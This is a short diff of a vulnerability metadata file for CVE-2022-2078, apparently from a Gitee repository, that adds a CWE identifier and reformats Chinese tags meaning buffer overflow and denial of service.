 cvss-score: 5.5
 cve-id: CVE-2022-2078
- cwe-id: CWE-120
+ cwe-id: CWE-120, CWE-121
 cnvd-id: None
 kve-id: None
- tags: 缓冲区溢出,拒绝服务
\ No newline at end of file
+ tags: 缓冲区溢出, 拒绝服务
\ No newline at end of file
-- Gitee